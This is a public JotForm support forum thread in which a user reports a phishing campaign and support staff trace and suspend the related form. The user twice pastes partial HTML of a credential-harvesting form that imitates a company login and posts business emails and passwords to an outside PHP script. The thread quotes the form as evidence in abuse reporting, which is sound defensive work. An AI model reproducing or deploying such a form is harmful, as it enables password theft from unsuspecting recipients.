What is JotForm?
JotForm is a free online form builder which helps you create online forms without writing a single line of code. No sign-up required.

At JotForm, we want to make sure that you’re getting the online form builder help that you need. Our friendly customer support team is available 24/7.

We believe that if one user has a question, there could be more users who may have the same question. This is why many of our support forum threads are public and available to be searched and viewed. If you’d like help immediately, feel free to search for a similar question, or submit your question or concern.


  • Profile Image

    Form is used form phishing

    Asked by lw on June 03, 2013 at 11:29 AM

    your service is being ABUSED for a worldwide password phishing campaign.

     

    i analyzed the source code of the phishing email with attached html,

    the url is somehow generated by a script.

    but anyway, it includes a link to

    http://max.jotfor.ms/min/g=formCss?3.0.2422

     

    i hope, you can identify that form on your service and block and delete it.

     

    best regards.

    lw

    Page URL:
    http://max.jotfor.ms/min/g=formCss?3.0.2422

    JotForm password phishing email source block
  • Profile Image
    JotForm Support

    Answered by EltonCris on June 03, 2013 at 12:02 PM

    Hi there,

    Thank you so much for reporting, sorry though but we were not able to find the form ID on the given URL. We'd appreciate if you could post the full source code so we can trace the form and suspend it right way.

    We are aware about the users who uses our service for phishing that is why we created an automated bayesian phishing form scanner similar to bayesian spam scanner but this scans phishing forms instead of malicious emails. Once our scanner detected the form as phishing or it has possibility to be used for phishing, the form will be auto-suspended right away. However, we can't deny the fact that some users with good knowledge about HTML can easily modify the form source code to bypass our anti-phishing scanner but we can review the forms manually here and suspend them if they violated our TOS.

    We'll be looking forward to your reply regarding this matter so we can assist you and suspend the form the soonest time possible.

    Thank you so much!

  • Profile Image

    Answered by lw on June 03, 2013 at 12:11 PM
    hi there!
    you want the complete sourcecode?
    no problem.
    see attached html file.
    to see it working, just open it or save it and drag it to an open
    browseer window.
    (there is NO script malware included, just the phishing thing.)
    this will show you the phishing form fields.
    then check the source code in the usual way.
    if possible, keep me up to date whether you could find and eliminate
    that scrap.
    best regards
    lw
    JotForm Support Forum wrote:
  • Profile Image
    JotForm Support

    Answered by EltonCris on June 03, 2013 at 12:16 PM

    Thanks for you reply. Unfortunately I couldn't find the attachment you've mentioned, it's probably because you are replying via email.

    We'd appreciate if you could post the codes directly to this thread: http://www.jotform.me/answers/224896-Form-is-used-form-phishing#2

    Thank you!

  • Profile Image

    Answered by lw on June 03, 2013 at 12:45 PM

    action="http://www.niets.playwebagency.com/addons/default/themes/Lacansta.php"
    method="post">


    value="http://www.gammaillumination.com/"> value="20353713128"
    type="hidden">




    MURRAY & ROBERTS

    We are Global
    Trader.





    Our Product Catologue
    Secured Website


    id="label_13" for="input_13"> Company Nameclass="form-required">*

    class="form-textbox validate[required]" id="input_13"
    name="q13_companyName13" size="20" type="text">


    id="label_1" for="input_1"> Business Emailclass="form-required">*

    class="form-textbox validate[required, Email]" id="input_1"
    name="q1_businessEmail1" size="30" type="email">


    id="label_3" for="input_3"> Password*

    class="form-textbox validate[required]" id="input_3" name="q3_password"
    size="20" type="password">




    id="input_2" type="submit" class="form-submit-button"> Enter






    style="font-size: 10pt; line-height: 115%;" lang="EN-GB">Suppliers
    Order-Quotation Platform*







    src="//www.murrob.com/images/murrob_logo_text_2012.jpg"
    border="0" height="87" width="310">








    Should be Empty: value="" type="text">


    type="hidden">

  • Profile Image
    JotForm Support

    Answered by EltonCris on June 03, 2013 at 12:49 PM

    Thanks!

    The account containing that form [Form ID: 20353713128] is now suspended. It will no longer accept user inputs.

    Thank you so much for your cooperation. 

    Best Regards!

  • Profile Image

    Answered by lw on June 03, 2013 at 01:00 PM
    impressively fast!
    but: - sorry to say - i opened the html-form right here from my desktop.
    IT STILL WORKS!
    the entry form is shown
    and it still accepts some dummy entries.
    could you please try that on your site?
    best regards
    lw
    JotForm Support Forum schrieb:
  • Profile Image
    JotForm Support

    Answered by EltonCris on June 03, 2013 at 01:09 PM

    Hi,

    Thanks for your reply. It seems you are right. I just review the source code and they have their custom form action URL "http://www.niets.playwebagency.com/addons/default/themes/Lacansta.php", they processed their own instead of using our form. Therefore we no longer have control about this. I have actually suspended the associated form but since they uses custom php code for processing submissions, I'm afraid there's nothing we can do about it anymore. The best way to stop this is to contact their domain/hosting provider and report the phishing form. They should be able to help you about this.

    Thank you!

  • Profile Image

    Answered by lw on June 03, 2013 at 02:18 PM
    hi there again!
    i'm afraid, you're totally right.
    the reference to jotform was somehow left in their sourcecode,
    but is no longer necessary.
    i had seen and traced the reference to niets.playwebagency,
    and to me it seems, this site has been hacked or is mis-used
    as well as yours, as it seems to be a thai internet provider
    of some kind.
    anyway, we got so far, i will try to contact them
    and tell them about this issue and ask them to stop
    that phishing action. i'm afraid, chances are bad for any success.
    thailand is far far away, and i'm in doubt about their moral and ethic
    standards concerning phishing & co.
    anyway ... thanks a lot for your efforts and your impressively fast
    action concerning this matter. really great!
    have a nice evening over there!
    best regards
    lw
    JotForm Support Forum schrieb:
  • Profile Image

    Answered by sidharth_kch on June 03, 2013 at 02:36 PM

    @Lw

    On behalf of my colleague EltonCris, you are welcome.

    You have put in so much of effort in this and there is no harm in reporting it to the Thai ISP. I believe they will definitely respond to you.

    Should you have any questions please feel free to contact us.

    Thanks,

    Sidharth

  • Profile Image

    Answered by lw on June 03, 2013 at 02:58 PM
    thanks so much to booth of you for this encouragement
    okay, i will continue on that tomorrow,
    as the corresponding mail is on my office pc.
    have a nice evening!
    bye for now
    lw
    JotForm Support Forum schrieb:
  • Profile Image

    Answered by sidharth_kch on June 03, 2013 at 03:01 PM

    @LW

    You too have a great evening.

    Thanks,

    Sidharth

  • Profile Image

    Answered by lw on June 06, 2013 at 08:28 AM
    hi there!
    it's me again concerning that phishing issue.
    they are sending emails again.
    and at least one href-link to jotfor is still/again working.
    so, please check this address
    http://max.jotfor.ms/min/g=formCss?3.0.2422
    thank you very much!
    lw

    JotForm Support Forum schrieb:
  • Profile Image

    Answered by sidharth_kch on June 06, 2013 at 09:04 AM

    @LW

    This is just the css url. Please let us know the form URL / website where the form is embedded. This will help us identify the form/account to take appropriate action.

    Thanks,

    Sidharth

  • Profile Image

    Answered by lw on June 06, 2013 at 09:15 AM

    action="http://www.niets.playwebagency.com/addons/default/themes/Lacansta.php"
    method="post">


    value="http://www.gammaillumination.com/"> value="20353713128"
    type="hidden">




    MURRAY & ROBERTS

    We are Global
    Trader.





    Our Product Catologue
    Secured Website


    id="label_13" for="input_13"> Company Nameclass="form-required">*

    class="form-textbox validate[required]" id="input_13"
    name="q13_companyName13" size="20" type="text">


    id="label_1" for="input_1"> Business Emailclass="form-required">*

    class="form-textbox validate[required, Email]" id="input_1"
    name="q1_businessEmail1" size="30" type="email">


    id="label_3" for="input_3"> Password*

    class="form-textbox validate[required]" id="input_3" name="q3_password"
    size="20" type="password">




    id="input_2" type="submit" class="form-submit-button"> Enter






    style="font-size: 10pt; line-height: 115%;" lang="EN-GB">Suppliers
    Order-Quotation Platform*







    src="//www.murrob.com/images/murrob_logo_text_2012.jpg"
    border="0" height="87" width="310">








    Should be Empty: value="" type="text">


    type="hidden">

  • Profile Image
    JotForm Support

    Answered by Welvin on June 06, 2013 at 09:42 AM

    Hi,

    Can you please send us the webpage URL to where that HTML Codes came from? I don't see any possible account of that user. He/she probably just using Jotform file path to get his/her desired design. 

    Thanks for your cooperation on this matter.

  • Profile Image

    Answered by lw on June 06, 2013 at 09:57 AM
    sorry, this html code was attached to an email.
    so actually, i cannot post any url.
    is that css a public one, for everyone, so that you cannot delete it?
    best regards
    lw
    JotForm Support Forum schrieb:
  • Profile Image

    Answered by jefreylandicho on June 06, 2013 at 10:31 AM

    You can paste the code here instead. We will not be able to make any changes to that file or page unless we are granted access to the server where the file/page is located.

  • Profile Image

    Answered by lw on June 06, 2013 at 10:42 AM
    ? ? ?
    sorry, this time i don't get your point.
    what's the benefit of posting the html-code at pastebin.com?
    the css we were talking about is located at jotform?
    why can't you delete that?
    best regards
    lw
    JotForm Support Forum schrieb:
  • Profile Image

    Answered by sidharth_kch on June 06, 2013 at 10:56 AM

    @LW

    This CSS file is being used by millions of other forms and it's for the looks and feel for a webpage. It can't be used for any DB connectivity or submissions. Deleting the css file will not help in any way to stop a file being used for phishing activity.

    This form in question is not using JotForm platform apart from using our CSS.

    Hope this helps!!

    Thanks,

    Sidharth

  • Profile Image

    Answered by lw on June 06, 2013 at 10:59 AM
    aaaaah!
    okay. now i got it.
    thanks for explaining that.
    okay, then let's get back to work and coffee! ;-)))
    best regards
    lw
    JotForm Support Forum schrieb: